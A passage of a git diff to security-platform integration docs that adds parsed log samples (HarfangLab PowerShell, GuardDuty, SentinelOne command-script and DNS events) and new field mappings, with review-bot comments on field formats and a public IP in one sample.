"hostname": "srv-gmao-prod" + }, + "organization": { + "id": "e13f90f553ce3a9e" + }, + "process": { + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + }, + "related": { + "hosts": [ + "srv-gmao-prod" + ] + }, + "user": { + "roles": "SERVERS" + } + } + + ``` + + === "process-event.json" ```json @@ -1197,6 +1252,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "log": { "hostname": "SFRTAOA" }, + "organization": { + "id": "0198bff0ef04d4a8" + }, "process": { "command_line": "C:\\windows\\system32\\cmd.exe /c wmic /namespace:\\\\root\\Microsoft\\Windows\\Defender path MSFT_MpComputerStatus get /format:list", "executable": "C:\\Windows\\System32\\cmd.exe", @@ -1564,6 +1622,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "log": { "hostname": "jdoe" }, + "organization": { + "id": "6685e1111111" + }, "process": { "command_line": "test1 query type= service", "executable": "C:\\Windows\\test.exe", @@ -1669,6 +1730,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "log": { "hostname": "SARTE03" }, + "organization": { + "id": "8029547657723b01" + }, "related": { "hosts": [ "SARTE03" @@ -1706,6 +1770,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "rule_level": "critical", "status": "new", "threat_id": "55" + }, + "organization": { + "id": "11111111111111111111" } } @@ -1739,6 +1806,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "status": "new", "threat_id": "829" }, + "organization": { + "id": "111111111111111" + }, "user": { "roles": "MyGroup!" } @@ -1825,9 +1895,15 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "log": { "hostname": "sfreort" }, + "organization": { + "id": "2222222222222222" + }, "related": { "hosts": [ "sfreort" + ], + "ip": [ + "1.2.3.4" ] }, "sekoiaio": { 
@@ -1852,6 +1928,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "server": { "domain": "EXAMPLE" }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, "user": { "id": "S-1-0-0", "roles": "Group1,Group2", @@ -1983,6 +2063,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "hosts": [ "REDACTED" + ], + "ip": [ + "166.88.151.58" ] }, "sekoiaio": { @@ -2007,6 +2090,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "server": { "domain": "WORKGROUP" }, + "source": { + "address": "166.88.151.58", + "ip": "166.88.151.58" + }, "user": { "id": "S-1-0-0", "target": { @@ -2160,10 +2247,17 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hosts": [ "REDACTED" ], + "ip": [ + "10.84.128.186" + ], "user": [ "ANONYMOUS LOGON" ] }, + "source": { + "address": "10.84.128.186", + "ip": "10.84.128.186" + }, "user": { "domain": "AUTORITE NT", "name": "ANONYMOUS LOGON" @@ -2227,6 +2321,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "log": { "hostname": "DS01" }, + "organization": { + "id": "1111111111111111" + }, "related": { "hosts": [ "DS01" @@ -2256,6 +2353,8 @@ The following table lists the fields that are extracted, normalized under the EC | ---- | ---- | ---------------------------| |`@timestamp` | `date` | Date/time when the event originated. | |`action.properties` | `object` | A detailed set of attributes associated with a specific action, typically involving user authentication or a network event. It contains the following keys: | +|`action.properties.Path` | `keyword` | | +|`action.properties.ScriptBlockText` | `keyword` | | |`action.properties.TaskContentNew_Args` | `keyword` | | |`action.properties.TaskContentNew_Command` | `keyword` | | |`agent.id` | `keyword` | Unique identifier of this agent. | 
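Review bot: in the new `powershell.json` transformed sample, `harfanglab.groups` holds the group as a serialised JSON string (`"{\"id\": \"14989c86-...\", \"name\": \"SERVERS\"}"`) instead of an object, so neither `id` nor `name` can be queried directly; if the parser is meant to flatten groups, map them to separate fields, and if the stringification is intentional, say so in the field table. The same sample sets `@timestamp` to `2024-08-02T09:03:13.833000Z`, which is the raw `@event_create_date`, while the raw event's own `@timestamp` is `2024-08-02T08:56:47.681487513Z`; the choice of which one becomes the event time should be documented, because the two differ by more than six minutes and analysts correlating with endpoint timelines will notice.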
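Review bot: the two new rows in the fields table, `action.properties.Path` and `action.properties.ScriptBlockText`, have an empty description column; give them a one-line description (the latter is the PowerShell script block text shown in the `powershell.json` sample) rather than extending the existing pattern of blank descriptions on the `TaskContentNew_*` rows.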
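Review bot: the hunks at `@@ -1983` and `@@ -2007` introduce `166.88.151.58` into `related.ip`, `source.address` and `source.ip`; this is a routable public address, so the sample should use a documentation range such as the `198.51.100.x` addresses already used in the GuardDuty sample in this same patch, or the `1.2.3.4` placeholder used in the neighbouring hunks, to avoid pointing readers at a real host.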
diff --git a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md index 65b8d0e93e..a414d943e3 100644 --- a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md +++ b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md @@ -1078,6 +1078,47 @@ In this section, you will find examples of raw logs as generated natively by the +=== "powershell" + + + ```json + { + "groups": [ + { + "id": "14989c86-9f2f-4d8d-92b5-1210034ca640", + "name": "SERVERS" + } + ], + "script_block": "$srv=Get-Service 'CARLTC85-CS02' -ErrorAction SilentlyContinue;\t\t\t\t\tif ($srv) { Write-Output $srv.status; exit 0 } else { exit 1 }", + "process_image_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "sha256": "cebeed9684d8b8cbd821db554e5bb4937ffa1d32f2ef57481866c5f0b09838b0", + "@event_create_date": "2024-08-02T09:03:13.833000Z", + "@version": "1", + "log_type": "powershell", + "@timestamp": "2024-08-02T08:56:47.681487513Z", + "pid": 26748, + "tenant": "e13f90f553ce3a9e", + "script_path": "", + "agent": { + "osproducttype": "Windows Server 2016 Datacenter", + "version": "3.8.16", + "additional_info": {}, + "ostype": "windows", + "osversion": "10.0.14393", + "hostname": "srv-gmao-prod", + "distroid": null, + "dnsdomainname": "cmnshipyard.local", + "agentid": "9f298e79-f284-4276-9176-83a02c40c8f0", + "domain": null, + "domainname": "CMNSHIPYARD" + }, + "incomplete": false, + "process_unique_id": "de5434d5-f284-4276-7c68-00312b6f2996" + } + ``` + + + === "process-event" diff --git a/_shared_content/operations_center/integrations/generated/3e060900-4004-4754-a597-d2944a601930.md b/_shared_content/operations_center/integrations/generated/3e060900-4004-4754-a597-d2944a601930.md index 6f856fc53f..4347b82ee9 100644 
--- a/_shared_content/operations_center/integrations/generated/3e060900-4004-4754-a597-d2944a601930.md +++ b/_shared_content/operations_center/integrations/generated/3e060900-4004-4754-a597-d2944a601930.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event_accesskey_apicall.json" @@ -911,6 +911,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "type": "Recon:EC2/PortProbeUnprotectedPort" }, + "source": { + "ips": [ + "198.51.100.0", + "198.51.100.1" + ] + }, "threats": { "evidence": [ "{\"threatListName\": \"GeneratedFindingThreatListName\", \"threatNames\": [\"GeneratedFindingThreatName\"]}" 
@@ -931,6 +937,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "provider": "aws", "region": "eu-west-2" }, + "destination": { + "address": "10.0.0.23", + "ip": "10.0.0.23" + }, + "related": { + "ip": [ + "10.0.0.23", + "198.51.100.0" + ] + }, + "source": { + "address": "198.51.100.0", + "ip": "198.51.100.0" + }, "threat": { "enrichments": [ { @@ -1196,6 +1216,7 @@ The following table lists the fields that are extracted, normalized under the EC | ---- | ---- | ---------------------------| |`@timestamp` | `date` | Date/time when the event originated. | |`agent.version` | `keyword` | Version of the agent. | +|`aws.guardduty.destination.ips` | `list` | Destination IPs when there is several | |`aws.guardduty.finding.accesskey` | `object` | Access Key details | |`aws.guardduty.finding.ecs` | `object` | ECS Details | |`aws.guardduty.finding.eks.details` | `object` | EKS cluster details | @@ -1216,6 +1237,7 @@ The following table lists the fields that are extracted, normalized under the EC |`aws.guardduty.finding.service.resource.role` | `keyword` | Resource role | |`aws.guardduty.finding.type` | `keyword` | Type of the finding | |`aws.guardduty.finding.volume.details` | `list` | volume details | +|`aws.guardduty.source.ips` | `list` | Source IPs when there is several | |`aws.guardduty.threats` | `object` | Present threats | |`aws.guardduty.threats.evidence` | `keyword` | Flattened version of evidence concerning the event | |`cloud.account.id` | `keyword` | The cloud account or organization id. | diff --git a/_shared_content/operations_center/integrations/generated/3f330d19-fdea-48ac-96bd-91a447bb26bd.md b/_shared_content/operations_center/integrations/generated/3f330d19-fdea-48ac-96bd-91a447bb26bd.md index 511c43e7cc..7b346bee09 100644 --- a/_shared_content/operations_center/integrations/generated/3f330d19-fdea-48ac-96bd-91a447bb26bd.md 
+++ b/_shared_content/operations_center/integrations/generated/3f330d19-fdea-48ac-96bd-91a447bb26bd.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event_application_blocked.json" diff --git a/_shared_content/operations_center/integrations/generated/3f99cdd8-aeca-4860-a846-6f2a794583e1.md b/_shared_content/operations_center/integrations/generated/3f99cdd8-aeca-4860-a846-6f2a794583e1.md index fc2fae3cd7..edc48d5da1 100644 --- a/_shared_content/operations_center/integrations/generated/3f99cdd8-aeca-4860-a846-6f2a794583e1.md +++ b/_shared_content/operations_center/integrations/generated/3f99cdd8-aeca-4860-a846-6f2a794583e1.md 
@@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "connect.json" diff --git a/_shared_content/operations_center/integrations/generated/40bac399-2d8e-40e3-af3b-f73a622c9687.md b/_shared_content/operations_center/integrations/generated/40bac399-2d8e-40e3-af3b-f73a622c9687.md index 860d2d1204..9005fec225 100644 --- a/_shared_content/operations_center/integrations/generated/40bac399-2d8e-40e3-af3b-f73a622c9687.md +++ b/_shared_content/operations_center/integrations/generated/40bac399-2d8e-40e3-af3b-f73a622c9687.md 
@@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "mcafee_access_log_blocked.json" diff --git a/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340.md b/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340.md index d265fe2cf2..3d2f093a22 100644 --- a/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340.md +++ b/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "commandscript.json" @@ -44,6 +44,11 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2023-03-30T13:46:07.040000Z", + "action": { + "properties": { + "ScriptBlockText": "{(Format-DiskSpaceMB $_.Space) + \"MB\"}" + } + }, "agent": { "version": "22.3.2.373" }, @@ -63,12 +68,19 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "process": { + "ossrc": { + "parent": { + "storyline_id": "0F91E6E7AB538ED5" + } + }, "parent": { "command_line": "taskhostw.exe", "executable": { "name": "C:\\Windows\\System32\\taskhostw.exe" - } - } + }, + "storyline_id": "3ED9E6E7AB538ED5" + }, + "storyline_id": "3ED9E6E7AB538ED5" }, "script": { "app_name": "PowerShell_C:\\Windows\\System32\\sdiagnhost.exe_10.0.19041.1", 
@@ -171,6 +183,159 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "commandscript_2.json" + + ```json + + { + "message": "{\"src.process.parent.isStorylineRoot\": false, \"event.category\": \"command_script\", \"tgt.file.modificationTime\": -11644473600000, \"src.process.parent.image.sha1\": \"99ae9c73e9bee6f9c76d6f4093a9882df06832cf\", \"site.id\": \"1470095163515336467\", \"src.process.image.binaryIsExecutable\": true, \"src.process.parent.displayName\": \"Windows Command Processor\", \"src.process.user\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"src.process.parent.subsystem\": \"SYS_WIN32\", \"src.process.indicatorRansomwareCount\": 0, \"src.process.crossProcessDupRemoteProcessHandleCount\": 7, \"src.process.activeContent.signedStatus\": \"unsigned\", \"src.process.tgtFileCreationCount\": 0, \"src.process.indicatorInjectionCount\": 0, \"src.process.moduleCount\": 1800, \"i.version\": \"preprocess-lib-1.0\", \"src.process.parent.name\": \"cmd.exe\", \"src.process.activeContentType\": \"FILE\", \"src.process.parent.activeContent.id\": \"3EFA3EFA3EFA3EFA\", \"src.process.image.md5\": \"097ce5761c89434367598b34fe32893b\", \"src.process.storyline.id\": \"7FABCCD60C10799B\", \"src.process.indicatorReconnaissanceCount\": 69, \"src.process.childProcCount\": 6, \"mgmt.url\": \"euce1-sns-mssp.sentinelone.net\", \"src.process.crossProcessOpenProcessCount\": 0, \"cmdScript.isComplete\": true, \"src.process.subsystem\": \"SYS_WIN32\", \"meta.event.name\": \"SCRIPTS\", \"src.process.parent.integrityLevel\": \"SYSTEM\", \"src.process.indicatorExploitationCount\": 0, \"src.process.parent.storyline.id\": \"7FABCCD60C10799B\", \"tgt.file.creationTime\": -11644473600000, \"src.process.integrityLevel\": \"SYSTEM\", \"i.scheme\": \"edr\", \"site.name\": \"Default site\", \"src.process.netConnInCount\": 0, \"event.time\": 1722588221803, \"timestamp\": \"2024-08-02T08:43:41.803Z\", \"account.id\": \"1470095162995242762\", \"dataSource.name\": 
\"SentinelOne\", \"endpoint.name\": \"ntrsql15\", \"src.process.image.sha1\": \"044a0cf1f6bc478a7172bf207eef1e201a18ba02\", \"tgt.file.size\": 50105, \"cmdScript.applicationName\": \"PowerShell_C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe_10.0.14393.0\", \"src.process.isStorylineRoot\": false, \"src.process.parent.image.path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"tgt.file.sha1\": \"4b09001438b32e54b91cbe27685c75a316f8cdf5\", \"dataSource.vendor\": \"SentinelOne\", \"src.process.pid\": 3744, \"src.process.parent.activeContent.hash\": \"1b11fdf894b9a205b690add505ff5f2193c1fe48\", \"tgt.file.isSigned\": \"signed\", \"src.process.cmdline\": \"powershell -executionpolicy bypass -file \\\"c:\\\\zabbix\\\\scripts\\\\sb.mssql.ps1\\\" poller RUIWS01 \", \"src.process.publisher\": \"MICROSOFT WINDOWS\", \"dataSource.category\": \"security\", \"src.process.crossProcessThreadCreateCount\": 0, \"src.process.parent.isNative64Bit\": false, \"src.process.parent.activeContentType\": \"CLI\", \"src.process.parent.isRedirectCmdProcessor\": false, \"src.process.parent.activeContent.path\": \"\\\\\\\\Unknown device\\\\Unknown file\", \"src.process.crossProcessCount\": 7, \"src.process.signedStatus\": \"signed\", \"tgt.file.isExecutable\": false, \"event.id\": \"01J4945B0JAAYZXWF8ZG4A0VMZ_638\", \"src.process.parent.cmdline\": \"cmd /C \\\"powershell -executionpolicy bypass -file \\\"c:\\\\zabbix\\\\scripts\\\\sb.mssql.ps1\\\" poller RUIWS01 \\\"\", \"cmdScript.content\": \"{ updateInfo_Serveurs -instance_name $instance -datas_res $res_infos }\", \"src.process.image.path\": \"C:\\\\Windows\\\\System32\\\\WINDOWSPOWERSHELL\\\\V1.0\\\\powershell.EXE\", \"src.process.tgtFileModificationCount\": 21, \"src.process.indicatorEvasionCount\": 101, \"src.process.netConnOutCount\": 0, \"cmdScript.sha256\": \"b285d770802aac13330fd7d2a0ade3c9a7adf575d160a81dfc30614c7a89e775\", \"tgt.file.path\": \"C:\\\\zabbix\\\\scripts\\\\sb.mssql.ps1\", \"tgt.file.extension\": 
\"ps1\", \"src.process.crossProcessDupThreadHandleCount\": 0, \"endpoint.os\": \"windows\", \"src.process.tgtFileDeletionCount\": 0, \"src.process.startTime\": 1722588220577, \"mgmt.id\": \"16205\", \"os.name\": \"Windows Server 2016 Standard\", \"tgt.file.type\": \"UNKNOWN\", \"src.process.activeContent.id\": \"B76839D30C10799B\", \"src.process.displayName\": \"Windows PowerShell\", \"src.process.activeContent.path\": \"C:\\\\zabbix\\\\scripts\\\\sb.mssql.ps1\", \"src.process.isNative64Bit\": false, \"src.process.parent.sessionId\": 0, \"src.process.uid\": \"07AED4D60C10799B\", \"src.process.parent.image.md5\": \"f4f684066175b77e0c3a000549d2922c\", \"src.process.indicatorBootConfigurationUpdateCount\": 0, \"src.process.indicatorInfostealerCount\": 0, \"process.unique.key\": \"07AED4D60C10799B\", \"cmdScript.originalSize\": 140, \"agent.version\": \"23.4.4.223\", \"src.process.parent.uid\": \"05AED4D60C10799B\", \"src.process.parent.image.sha256\": \"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\", \"src.process.sessionId\": 0, \"src.process.netConnCount\": 0, \"mgmt.osRevision\": \"14393\", \"group.id\": \"7FABCCD60C10799B\", \"src.process.isRedirectCmdProcessor\": false, \"src.process.verifiedStatus\": \"verified\", \"src.process.parent.publisher\": \"MICROSOFT WINDOWS\", \"src.process.parent.startTime\": 1722588220333, \"src.process.dnsCount\": 0, \"endpoint.type\": \"server\", \"trace.id\": \"01J4945B0JAAYZXWF8ZG4A0VMZ\", \"src.process.name\": \"powershell.EXE\", \"agent.uuid\": \"f373bf5f3c5541a49aad49c5d39deac8\", \"src.process.activeContent.hash\": \"4b09001438b32e54b91cbe27685c75a316f8cdf5\", \"src.process.image.sha256\": \"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436\", \"src.process.indicatorGeneralCount\": 161, \"src.process.crossProcessOutOfStorylineCount\": 1, \"packet.id\": \"C6BB63A4EEC044B7BFEDC8B39D2594AD\", \"src.process.registryChangeCount\": 0, \"src.process.indicatorPersistenceCount\": 0, 
\"src.process.parent.signedStatus\": \"signed\", \"src.process.parent.user\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"tgt.file.id\": \"B76839D30C10799B\", \"account.name\": \"S - SOCRAM BANQUE\", \"event.type\": \"Command Script\", \"task.path\": \"C:\\\\zabbix\\\\scripts\\\\sb.mssql.ps1\", \"src.process.indicatorPostExploitationCount\": 8, \"src.process.parent.activeContent.signedStatus\": \"unsigned\", \"src.process.parent.pid\": 3776}", + "event": { + "action": "Command Script", + "category": [ + "process" + ], + "dataset": "cloud-funnel-2.0", + "type": [ + "info" + ] + }, + "@timestamp": "2024-08-02T08:43:41.803000Z", + "action": { + "properties": { + "Path": "C:\\zabbix\\scripts\\sb.mssql.ps1", + "ScriptBlockText": "{ updateInfo_Serveurs -instance_name $instance -datas_res $res_infos }" + } + }, + "agent": { + "version": "23.4.4.223" + }, + "deepvisibility": { + "agent": { + "managment_url": "euce1-sns-mssp.sentinelone.net", + "trace_id": "01J4945B0JAAYZXWF8ZG4A0VMZ", + "uuid": "f373bf5f3c5541a49aad49c5d39deac8" + }, + "event": { + "category": "command_script", + "type": "Command Script" + }, + "host": { + "os": { + "revision": "14393" + } + }, + "process": { + "activecontent": { + "hash": { + "sha1": "4b09001438b32e54b91cbe27685c75a316f8cdf5" + }, + "path": "C:\\zabbix\\scripts\\sb.mssql.ps1" + }, + "parent": { + "activecontent": { + "path": "\\\\Unknown device\\Unknown file" + }, + "storyline_id": "7FABCCD60C10799B" + }, + "storyline_id": "7FABCCD60C10799B" + }, + "script": { + "app_name": "PowerShell_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe_10.0.14393.0", + "content": "{ updateInfo_Serveurs -instance_name $instance -datas_res $res_infos }" + } + }, + "file": { + "code_signature": { + "exists": false + }, + "created": "1966-04-24T06:14:24Z", + "directory": "C:\\zabbix\\scripts", + "hash": { + "sha1": "4b09001438b32e54b91cbe27685c75a316f8cdf5", + "sha256": "b285d770802aac13330fd7d2a0ade3c9a7adf575d160a81dfc30614c7a89e775" + }, + "mtime": 
"1966-04-24T06:14:24Z", + "name": "sb.mssql.ps1", + "path": "C:\\zabbix\\scripts\\sb.mssql.ps1", + "size": 140 + }, + "host": { + "name": "ntrsql15", + "os": { + "family": "windows", + "name": "Windows Server 2016 Standard" + }, + "type": "server" + }, + "observer": { + "vendor": "SentinelOne" + }, + "process": { + "code_signature": { + "exists": true, + "subject_name": "MICROSOFT WINDOWS" + }, + "command_line": "powershell -executionpolicy bypass -file \"c:\\zabbix\\scripts\\sb.mssql.ps1\" poller RUIWS01 ", + "executable": "C:\\Windows\\System32\\WINDOWSPOWERSHELL\\V1.0\\powershell.EXE", + "hash": { + "md5": "097ce5761c89434367598b34fe32893b", + "sha1": "044a0cf1f6bc478a7172bf207eef1e201a18ba02", + "sha256": "ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436" + }, + "name": "powershell.EXE", + "parent": { + "code_signature": { + "exists": true, + "subject_name": "MICROSOFT WINDOWS" + }, + "command_line": "cmd /C \"powershell -executionpolicy bypass -file \"c:\\zabbix\\scripts\\sb.mssql.ps1\" poller RUIWS01 \"", + "executable": "C:\\Windows\\System32\\cmd.exe", + "hash": { + "md5": "f4f684066175b77e0c3a000549d2922c", + "sha1": "99ae9c73e9bee6f9c76d6f4093a9882df06832cf", + "sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" + }, + "name": "cmd.exe", + "pid": 3776, + "start": "2024-08-02T08:43:40.333000Z", + "title": "Windows Command Processor", + "user": { + "name": "AUTORITE NT\\Syst\u00e8me" + }, + "working_directory": "C:\\Windows\\System32" + }, + "pid": 3744, + "start": "2024-08-02T08:43:40.577000Z", + "title": "Windows PowerShell", + "user": { + "name": "AUTORITE NT\\Syst\u00e8me" + }, + "working_directory": "C:\\Windows\\System32\\WINDOWSPOWERSHELL\\V1.0" + }, + "related": { + "hash": [ + "044a0cf1f6bc478a7172bf207eef1e201a18ba02", + "097ce5761c89434367598b34fe32893b", + "4b09001438b32e54b91cbe27685c75a316f8cdf5", + "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", + 
"99ae9c73e9bee6f9c76d6f4093a9882df06832cf", + "b285d770802aac13330fd7d2a0ade3c9a7adf575d160a81dfc30614c7a89e775", + "ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436", + "f4f684066175b77e0c3a000549d2922c" + ], + "user": [ + "Syst\u00e8me" + ] + }, + "user": { + "domain": "AUTORITE NT", + "name": "Syst\u00e8me" + } + } + + ``` + + === "dns_dnsresolved.json" ```json @@ -215,12 +380,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "sha256": "20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50" }, "name": "backgroundTaskHost.exe", + "ossrc": { + "parent": { + "storyline_id": "5696E5E7AB538ED5" + }, + "storyline_id": "AC96E5E7AB538ED5" + }, "parent": { "command_line": "sihost.exe", "executable": { "name": "C:\\Windows\\System32\\sihost.exe" - } - } + }, + "storyline_id": "BE98E5E7AB538ED5" + }, + "storyline_id": "6EB4E5E7AB538ED5" } }, "dns": { 
@@ -323,6 +496,132 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "dns_macos.json" + + ```json + + { + "message": "{\n \"src.process.image.path\": \"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper\",\n \"src.process.subsystem\": \"SUBSYSTEM_UNKNOWN\",\n \"src.process.parent.isStorylineRoot\": true,\n \"event.category\": \"dns\",\n \"src.process.parent.integrityLevel\": \"INTEGRITY_LEVEL_UNKNOWN\",\n \"src.process.parent.image.sha1\": \"adc83b19e793491b1c6ea0fd8b46cd9f32e592fc\",\n \"src.process.parent.storyline.id\": \"0A62D926-DFE7-4968-AA28-F0024BAC804D\",\n \"src.process.isRedirectCmdProcessor\": false,\n \"src.process.parent.publisher\": \"\",\n \"src.process.parent.startTime\": 1713167784335,\n \"endpoint.type\": \"laptop\",\n \"endpoint.os\": \"osx\",\n \"src.process.integrityLevel\": \"INTEGRITY_LEVEL_UNKNOWN\",\n \"src.process.parent.displayName\": \"Google Chrome\",\n \"src.process.name\": \"Google Chrome Helper\",\n \"src.process.startTime\": 1713167795818,\n \"agent.uuid\": \"75084C59-0F8A-479D-A9C4-2232C37D9D51\",\n \"event.dns.response\": \"type: 5 edge-web-gew4.dual-gslb.spotify.com;2600:1901:1:4be::;\",\n \"src.process.image.sha256\": \"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\n \"src.process.user\": \"jdoe\",\n \"timestamp\": \"2024-06-26T08:44:30.000Z\",\n \"src.process.displayName\": \"Google Chrome Helper\",\n \"endpoint.name\": \"MXY2XC6J7VJ\",\n \"src.process.image.sha1\": \"adc83b19e793491b1c6ea0fd8b46cd9f32e592fc\",\n \"event.dns.request\": \"type: 28 gew4-spclient.spotify.com\",\n \"src.process.isStorylineRoot\": false,\n \"src.process.parent.image.path\": \"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome\",\n \"src.process.isNative64Bit\": false,\n \"src.process.parent.sessionId\": 0,\n \"src.process.uid\": 
\"CF37475F-BCA9-4F89-8A31-7B6C88CC6F1E\",\n \"src.process.parent.image.md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"src.process.parent.user\": \"psinha\",\n \"src.process.pid\": 1063,\n \"src.process.parent.name\": \"Google Chrome\",\n \"src.process.cmdline\": \"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=network --shared-files --field-trial-handle=1718379636,r,10310964397040083203,6939088771020272477,262144 --variations-seed-version=20240412-130119.249000 --seatbelt-client=25\",\n \"src.process.publisher\": \"\",\n \"src.process.parent.isNative64Bit\": false,\n \"src.process.parent.isRedirectCmdProcessor\": false,\n \"src.process.image.md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"src.process.storyline.id\": \"0A62D926-DFE7-4968-AA28-F0024BAC804D\",\n \"event.type\": \"DNS Resolved\",\n \"agent.version\": \"24.1.2.7444\",\n \"src.process.signedStatus\": \"signed\",\n \"src.process.parent.image.sha256\": \"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\n \"src.process.parent.cmdline\": 